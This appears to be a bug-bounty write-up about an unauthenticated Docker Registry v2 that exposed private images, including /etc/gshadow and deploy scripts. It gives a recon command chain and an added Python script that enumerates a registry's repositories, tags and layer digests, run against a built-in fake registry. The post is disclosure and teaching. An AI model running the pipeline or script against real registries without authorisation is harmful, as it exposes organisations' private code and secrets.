Insecure Docker Registry API Leads To Pull All Private Docker Images

Mostafa
3 min read · Apr 20, 2023


Hello guys, I would like to share this report, which has been reported to a public program on Bugcrowd.

Summary

What is Docker?
Docker is a very popular platform used by developers to eliminate "works on my machine" problems when collaborating on code with co-workers. Enterprises use Docker to build agile software delivery pipelines that ship new features faster, more securely and with more confidence.

What are Docker Images and Containers?
An image is a file system plus the parameters to use at run time. It has no state and never changes. A container image is a lightweight, stand-alone, executable package of a piece of software that includes everything needed to run it: code, runtime, system tools, system libraries and settings. Containers isolate software from its surroundings, for example from differences between development and staging environments, and help reduce conflicts between teams running different software on the same infrastructure.

What is Docker Registry?
The Registry is a stateless, highly scalable server-side application that stores and distributes Docker images over an HTTP API. The earlier v1 API had a number of design and security problems, so the v2 API (content-addressable, with manifests and layers referenced by digest) was released and considerably improved security. It should be noted, however, that neither version of the Docker Registry enables authentication by default: a registry deployed without an auth configuration will answer any client that can reach it, and the catalog, tags and blobs of every image can be read anonymously.

Steps To Reproduce The Vulnerability

1- Subdomain enumeration (findomain -t target.com -u subdomains.txt)

2- I used filter-resolved to keep only the subdomains that resolve (cat subdomains.txt | filter-resolved >> resolved.txt)

3- I used the cf-check tool to find the hosts that are not behind Cloudflare, so that the origin IPs can be tested directly (cat resolved.txt | cf-check | tee -a ips_to_test.txt)

4- Then it was time to find the live HTTP services (cat ips_to_test.txt | httpx -t 500 -o live_to_scan.txt)

5- After some time I found an open registry: https://vulnerable_docker_registry/v2/_catalog returned the list of repositories without asking for any authentication.

6- To exploit this, pull the images from the registry (docker pull HOST:PORT/IMAGE_NAME:TAG). Without a tag, docker pull defaults to :latest; the available tags for each repository are listed at /v2/IMAGE_NAME/tags/list. If the registry is served over plain HTTP, the host must first be added to the Docker daemon's insecure-registries setting.

7- Alternatively, the NotSoSecure docker_fetch tool (https://github.com/NotSoSecure/docker_fetch) downloads the image manifests and layers directly through the registry API, without needing a Docker daemon.

8- Congratulations, you now have access to the private Docker images.

9- I used GitGuardian (https://www.gitguardian.com/) to detect sensitive information in the Docker images.

10- Some of the sensitive information found in the Docker images:

- screenshot of a requirements.txt file containing all the dependencies of the Django projects
- the /etc/gshadow file, listing all internal groups
- screenshot of some internal scripts used to deploy the application
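The steps above are done by hand with curl, docker and a third-party script. As an added example (my code, not the author's and not the docker_fetch tool), the script below walks the Docker Registry HTTP API v2 the same way: it checks GET /v2/ to tell an open registry from one enforcing token or basic auth (a 401 with a WWW-Authenticate header), pages through /v2/_catalog by following the Link header, lists the tags of every repository, and pulls the config and layer digests out of each schema-2 manifest, which is exactly what docker pull fetches from /v2/<repo>/blobs/<digest>. So that it runs offline, it is driven against a constructed in-memory fake registry (the registry.example.invalid host, the repository names and the digests are made up); swap in http_get to run it against a real host you are authorised to test.

```python
# Added example, not the author's code: enumerate a Docker Registry v2 over its
# HTTP API. The fake registry at the bottom is constructed test data.
import json
import re
import urllib.error
import urllib.request

MANIFEST_V2 = "application/vnd.docker.distribution.manifest.v2+json"


def http_get(url, headers=None):
    """GET returning (status, lower-cased headers, body); 4xx is not raised."""
    req = urllib.request.Request(url, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, {k.lower(): v for k, v in resp.headers.items()}, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, {k.lower(): v for k, v in err.headers.items()}, err.read()


def auth_mode(base, get=http_get):
    """GET /v2/ is the version check: 200 means the registry is open to anyone,
    401 plus WWW-Authenticate means token (Bearer) or Basic auth is enforced."""
    status, hdrs, _ = get(base + "/v2/")
    if status == 200:
        return "open"
    if status == 401:
        return "auth: " + hdrs.get("www-authenticate", "(no challenge)")
    return "unexpected %d" % status


def list_repositories(base, get=http_get, page=100):
    """Read /v2/_catalog, following Link: <...>; rel="next" pagination."""
    repos, path = [], "/v2/_catalog?n=%d" % page
    while path:
        status, hdrs, body = get(base + path)
        if status != 200:
            break
        repos += json.loads(body)["repositories"]
        nxt = re.search(r'<([^>]+)>;\s*rel="next"', hdrs.get("link", ""))
        path = nxt.group(1) if nxt else None
    return repos


def list_tags(base, repo, get=http_get):
    """Tags of one repository; "tags" is null when every tag was deleted."""
    status, _, body = get("%s/v2/%s/tags/list" % (base, repo))
    if status != 200:
        return []
    return json.loads(body).get("tags") or []


def layer_digests(base, repo, ref, get=http_get):
    """Config + layer digests from a schema-2 manifest: each one is a blob at
    /v2/<repo>/blobs/<digest>, which is all docker pull needs."""
    status, _, body = get("%s/v2/%s/manifests/%s" % (base, repo, ref),
                          {"Accept": MANIFEST_V2})
    if status != 200:
        return []
    manifest = json.loads(body)
    return [manifest["config"]["digest"]] + [l["digest"] for l in manifest["layers"]]


def dump_registry(base, get=http_get):
    """repo -> tag -> blob digests for every image the registry exposes."""
    return {r: {t: layer_digests(base, r, t, get) for t in list_tags(base, r, get)}
            for r in list_repositories(base, get)}


# ---- constructed fake registry (made-up names and digests) for offline use ----
FAKE_BASE = "https://registry.example.invalid"
_FAKE = {
    "/v2/": (200, {}, b"{}"),
    "/v2/_catalog?n=100": (200, {"link": '</v2/_catalog?n=100&last=api>; rel="next"'},
                           b'{"repositories":["api"]}'),
    "/v2/_catalog?n=100&last=api": (200, {}, b'{"repositories":["worker"]}'),
    "/v2/api/tags/list": (200, {}, b'{"name":"api","tags":["latest","v2"]}'),
    "/v2/worker/tags/list": (200, {}, b'{"name":"worker","tags":null}'),
    "/v2/api/manifests/latest": (200, {}, json.dumps({
        "schemaVersion": 2, "config": {"digest": "sha256:c0ffee"},
        "layers": [{"digest": "sha256:aaaa"}, {"digest": "sha256:bbbb"}]}).encode()),
    "/v2/api/manifests/v2": (200, {}, json.dumps({
        "schemaVersion": 2, "config": {"digest": "sha256:dead"},
        "layers": [{"digest": "sha256:beef"}]}).encode()),
}


def fake_get(url, headers=None):
    """Stand-in for http_get that answers from the constructed table above."""
    return _FAKE.get(url[len(FAKE_BASE):], (404, {}, b"{}"))


def fake_get_locked(url, headers=None):
    """Same registry but with token auth enabled, as a properly configured one is."""
    return 401, {"www-authenticate": 'Bearer realm="https://auth.example.invalid/token"'}, b"{}"


if __name__ == "__main__":
    print("open registry:", auth_mode(FAKE_BASE, fake_get))
    print("locked registry:", auth_mode(FAKE_BASE, fake_get_locked))
    print(json.dumps(dump_registry(FAKE_BASE, fake_get), indent=2))
```

With a real host, dump_registry gives you every repo:tag to feed to docker pull, and the digests it returns can be downloaded as files from /v2/<repo>/blobs/<digest> if you prefer to avoid the Docker daemon. A correctly secured registry answers the very first request with a 401 and a Bearer challenge, which is the check a defender should run against every registry they expose.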

References

1- https://notsosecure.com/anatomy-of-a-hack-docker-registry

2- https://www.gitguardian.com/
